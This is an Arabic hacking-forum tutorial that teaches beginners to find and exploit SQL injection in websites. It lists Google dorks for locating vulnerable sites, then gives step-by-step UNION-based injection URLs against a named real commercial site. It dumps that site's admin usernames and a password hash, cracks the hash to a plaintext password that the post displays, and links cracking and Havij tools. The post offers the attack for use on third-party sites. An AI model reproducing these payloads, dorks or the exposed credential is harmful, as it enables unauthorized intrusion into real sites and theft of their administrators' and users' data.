:: vBspiders Professional Network :: - مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا

مرحبا بجميع الاخوة الكرام
lمقدمة الان نذهب للمهم اولا سوف نضع تعريفا لما يسمى بحقن قواعد البيانات والمصطلحات الاساسية فيه
: التعريف
أولا تعريف قاعدة البيانات
ساضرب لكم مثال لكي تفهمو ما معنى قاعدة بيانات لو طلب منك تخزين بيانات مجموعة من العاملين ستحتاج في بياناتهم الى اسمهم الاول مثلا واللقب ورقم الهاتف ثم العنوان والبريد الالكتروني هذه التي اعطيتك اياها تسمى حقول القاعدة والقاعدة ككل عنوانها سيكون بيانات العاملين اذا اصبح لدينا حقول فارغة ستبدا بتعبئتها لتصبح عندك قاعدة بيانات نشيطة ولو طلبت منك استخراج بيانات الموظف صاحب رقم الهاتف كذا ستلجا الى حقل الهاتف ثم تبحث عن الرقم المطلوب عندما تجده ستتجه الى خانة الاسم المقابل لهذا الرقم ليظهر لك صاحب الرقم

هذا هو الشرح العام لمعنى قاعدة بيانات

وكل منتدى أو موقع ايا كان هو عبارة عن اعضاء ومواضيع وردود بشكل عام هذه تعتبر هي جداول المنتدى بالاضافة الى غيرها من الجداول لذلك حتى يتم تخزين هذه الجداول يتطلب منا انشاء قاعدة لتحتوي على هذه الجداول وغيرها ويصبح لدينا منتدى

المسؤول عن قاعدة البيانات كل من يملك صلاحية الدخول الى لوحة تحكم الموقع ليضيف من هنالك قاعدة جديدة او يجري تعديلات على القاعدة
والجداول المذكورة سابقا من مواضيع وردود نحن لا تهمنا نحن من يهمنا الجداول التي تحتوي على اليوزر أي اسم الادمين يعني مدير الموقع والباسوورد يعني كلمة السر
وقواعد البيانات يقوم بتصميمها مبرمجون ولكن في بعض الاحيان هؤلاء المبرمجون يرتكبون أخطاء ومن هذه الاخطاء خطأ يسبب ثغرة الحقن ويتم استغلال ثغرة الحقن عن طريق توجيه اوامر واستعلامات الى القاعدة ببساطة اكثر يعني كتابة اوامر يعني اكواد وكلمات بعد المتغير لا تعرف ماهو المتغيير المتغير هو الرقم الذي يأتي في رابط
= الموقع المصاب بعد علامة
مثلا
www.xxxxxxxxxx.com/inscription.php?id=14
الرقم المكتوب بالاحمر هو المتغير
يعني لاختراق الموقع نقوم بكتابة أوامر معينة هي الاستعلامات بعد الرقم وهذه الاوامر سنتطرق اليها فيما بعد
وثانيا هناك مصطلح الدوركات وهي اكواد توضع في محركات البحث للبحث عن اهدافنا اي مواقع مصابة

تكلمنا في المقدمة عن حقن قواعد البيانات وتعريفها وبعض المصطلحات
الان سنبين كيفية البحث عن المواقع المصابة في صديقنا المقرب google
يتم ذلك بطريقتين
:1_____الطريقة الاولى ببساطة البحث في المنتديات مثلا بكتابة:
Sqlمواقع مصابة بثغرات
أو أي شيء اخر يكفي ان تشغل عقلك
2_____الطريقة الثانية:
هي بكتابة مايسمى بالدوركات وقد شرحنا معناها في مقدمة الدورة
واليكم بعض الدوركات
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
يكفي ان تكتبوها في محرك البحث وتظهر المواقع المصابة ويمكنكم البحث عن دوركات اخرى في محرك البحث مثلا بكتابة دوركات للبحث عن المواقع المصابة بثغرة الحقن
الان بحثنا عن المواقع المصابة ولكن علينا ان نتأكد من انها مصابة ويتم ذلك بوضع هذه العلامة (') بعد المتغير ولقد تم شرح ما معنى المتغير في المقدمة

الان عرفنا كيف نبحث عن الموقع المصاب الان نعرف اول خطوة في حقن قواعد البيانات أولا نختار موقع لنجرب عليه عندي موقع مصاب
http://www.bananecoco.com/achat/index.php?id=17
لنتاكد من انه مصاب نضع علامة '
كما شرحنا فس السابق اي يصبح الرابط هكذا
http://www.bananecoco.com/achat/index.php?id=17'
تابع الصورة
http://img103.herosh.com/2011/06/20/645615959.png
كما ترون ظهر الخطأ هاذا يعني ان الموقع مصاب
الان عرفنا ان في الموقع ثغرة حقن والان علينا استغلالها
اول ما سنفعله هو معرفة عدد الاعمدة في قاعدة البيانات
ويتم ذلك بامر

كود PHP:

   order by --

في مكان النقاط نكتب رقم اولا نبدا بالرقم واحد اي يصبح الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=17 order by 1--

تابع الصورة
http://img102.herosh.com/2011/06/20/192306586.png

كما ترون لا يوجد هناك خطأ لتستوعبو الامر اننا نوجه اوامر للقاعدة لنسحب منها بيانات الادمن يعني لو كتبنا امرا خاطئا سيضهر لنا خطأ مثلما ضهر لنا في السابع يعني لو كتبنا عدد اعمدة اكثر من التي في القاعدة يظهر لنا خطء وبالتجريب نستطيع معرفة عدد الاعمدة مثلا نكتب order by 20—
يعني يصير الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=17 order by 20--

شوفو ماذا حدث
http://img102.herosh.com/2011/06/20/20602362.png
ظهر لنا الخطأ هاذا يعني ان عدد الاعمدة اقل من 20
الان ما ذا نفعل نستمر في انقاص الارقام
يعني نتابع تغيير الارقام تنازليا
يعني مثلا هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=17 order by 19--

ظهر لن الخطا
ثم

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=17 order by 18--

ايضا ظهر لنل الخطا نستمر بالانقاص حتى لايضهر لنا الخطا
نجرب

كود PHP:

   --http://www.bananecoco.com/achat/index.php?id=17 order by  14

ظهر لنا الخطأ

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=17 order by 13--

الان لم يظهر لنا الخطأ يعني القاعدة فيها 13 عمود
الان عرفنا عدد الاعمدة الان ناتي للخطوة التي بعدها قلنا في السابق ان الموقع مصاب والحقيقة هي ان بعض الاعمدة في القاعدة مصابة وليس كلها اذن علينا ان نعرف العود المصاب ولذلك نضيف هاذا الاستعلام الى الرابط
+union+select+الاعمدة الموجودة في الموقع--
يعني في حالتنا الاعمدة 13 يعني الامر يكون هكذا
+

كود PHP:

   union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

وهناك شيء اخر نضيف علامة – قبل المتغير يعني يصير الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

تابع الصورة
http://img105.herosh.com/2011/06/20/948839215.png
كما ترون في الصورة ظهرت ارقام 2و3و5
هذه الارقام هي الاعمدة المصابة في هاذا الموقع نحن نحتاج واحدا فقط انا اخترت العمود 3
نتابع
الان عرفنا عمودا مصابا الان يجب ان نعرف اصدار قاعدة البيانات اذا كان 4 او 5
ولذلك نكتب
version()
في مكان العمود المصاب يعني يصير الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13--

تابع الصورة
http://img104.herosh.com/2011/06/20/994864535.png
كما ترون مكتوب
5.0.44-log
يعني اصدار رقم 5
لوطلعلك رقم 5 تابع الخطوات الاتية ظهرلك ولورقم 4 توقف وانتضر ساشرح ذلك فيما بعد
المهم عرفنا اصدار القاعدة
الان نضيف امر

كود PHP:

   concat(table_name,0x3a,column_name,0x3a,table_schema)

في مكان المود المصاب
و

كود PHP:

   +from+information_schema.columns—

في اخر الرابط
يعني يصبح الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns--

وتذكر اذا طلع لك خطء يعني ارتكبت خطا واذا لم يظهر أي خطا يعني ان استغلالك صحيح
وتذكر ايضا انه يمكن ان تضهر النتائج في أي مكان في الاعلى او الاسفل وفي أي مكان
الان نضيف هاذا الامر

كود PHP:

   +where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

هاذا الامر لمعرفة اسم اليوزر يعني يصبح الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

تابع الصورة
http://img105.herosh.com/2011/06/20/611291193.png

كما ترون ظهر لنا في اول النتائج
utilisateurs
users وليس دائما يكون هكذا ممكن تجده
او أي اسم اخر يعني على حسب لغة الموقع اذا كيف تعرفه سهلة لانه ياتي في الاول يعني الاول في النتائج
الان ناخذ الاسم الذي وجدناه ونتوجه لموقع
http://www.waraxe.us/sql-char-encoder.html

تابع الصورة

[url=http://www.herosh.com]http://img105.herosh.com/2011/06/20/532487988.png[/url
ناخذ الكود كما شاهدتم
كان الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

الذي مكتوب بالاحمر نحذفه ونحط بدله
+where+table_name=هنا الكود الذي اخذناه من الخطوة السابقة
يعني في حالتنا هكذا

كود PHP:

   +where+table_name=0x7574696c6973617465757273--

يعني يصير الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x7574696c6973617465757273--

group_ ثم نضيف كلمة
قبل concat
في الرابط يعني يصير الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x7574696c6973617465757273--

تابع الصورة
http://img103.herosh.com/2011/06/20/415283474.png
كما ترون ناخذ

utilisateurs و nom_utilisateur وmot_passe
يعني نحن اخذنا اسم اليوزر واسم كلمة السر واسم اليوزرنايم
وليس في كل مرة تكون هكذا كما قلت لكم يعني حسب لغة الموقع
والان نرجع للرابط الاول

http://www.bananecoco.com/achat/inde...,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0 x7574696c6973617465757273--
نستبدل ماهو ملون بالاحمر باسم اليوزر يعني في حالتنا utilisateurs
وماهو بالاخضر بكلمة السر يعني في حالتنا
Mot_passe
وماهو بالازرق باليوزر نايم يعني في حالتنا
Nom_utilisateur
يعني يصبح الرابط هكذا

كود PHP:

   http://www.bananecoco.com/achat/index.php?id=-17+union+select+1,2,group_concat(nom_utilisateur,0x3a,mot_passe),4,5,6,7,8,9,10,11,12,13+from+utilisateurs--

تابع الصورة
http://img104.herosh.com/2011/06/20/407237183.png

مبروك عليك وفي حالتنا هذه هناك في الموقع عدة مديرين نحن نكتفي بواحد

palmier نختار
كلمة مروره المشفرة
054066b810990de8

ولكن كلمة السر مشفرة وهاذا مايسمى بالهاش ولمعرفة كلمة السر علينا فك تشفير الهاش ولفكه يجب علينا اولا ان نعرف نوعه وذلك من خلال هذه الاداة
http://www.mediafire.com/?crm0zzi13j59lhn
حملها وافتحها في الاول تظهر لك صورة من الوجوه الضاحكة اضغط فيها وبعد الضغط تابع الصورة
http://img102.herosh.com/2011/06/20/405405759.png
كما ترون ظهر لنا نوعه وهو my sql
اذا ضهر لك هاذا النوع يمكنك فكه بهذه الاداة
تابع الشرح
الأداة اسمها

mysqlfast.exe

تمت ترجمتها لعيونكم و رفعهاعلى الميديا

http://www.mediafire.com/?rd92kul4iacbqxo

استعمال الأداة

ندخل على موجة الدوس :

start >>> run >>> cmd

و ندخل إلى مسار الأداة :

أنا حاطط الأداة في هذا المسار

C:\mysqlfast.exe

نكتب اسم الأداة :

mysqlfast.exe

نشرح طريقة استعمالها

أمر استعماله والتطبيق على الهاش
اكتب هاذا الامر في الدوس

mysqlfast.exe 054066b810990de8 x

وهذا الناتج

http://img105.herosh.com/2011/06/20/999402557.png

تم الفك مبروك
كلمة السر هي
chamax

هاذا ان كان من نوع my sql
ويمكن ان يكون من نوع md5
وفكه سهل اذهب على موقع
hashkiller.com
اولا سجل في الموقع ههههه لن اشرح ذلك بالصور لانني اضن ان الكل يعرف طريقة التسجيل
بعد التسجيل اذهب على webcrack
اكتب الهاش واضغط على webcrack
وستضهر لك كلمة السر في الاسفل
اما اذا كان من نوع اخر ابحث عن ادوات اخرى لفكه
المهم يا اخواني الان حصلنا على اليوزر نايم والباس

والان تذكرتم اني قلت لكم
اذا كان اصدار القاعدة 5 تابعو معي الان اذا وجدت اصدار القاعدة 4 هناك طرق لحقنه ولكني اخبرك دعك منها وحان وقت نوع اخر من الحقن وهو الحقن الاوتوماتيكي وافضل برناج هو برنامج هافيج لن اعمل له شرح لانه موجود في المنتدى الرابط
http://www.vbspiders.com/vb/t41063.html
ملاحظة البرنامج يحقن بجميع الانواع يعني ايضا الاصدار 5

وفي الاخير بما انك حصلت على كلمة السر الان يجب عليك ايجاد مسار لوحة التحكم وهاذا ايضا ببرنامج havij
وذلك ايضا مشروح في الرابط العلوي

في الاخير اقدم هاذا الموضوع لجميع الاعضاء الكرام وارجو التقييم تقديرا لتعبي

تم الشرح من neo-m

neo@vbspiders.com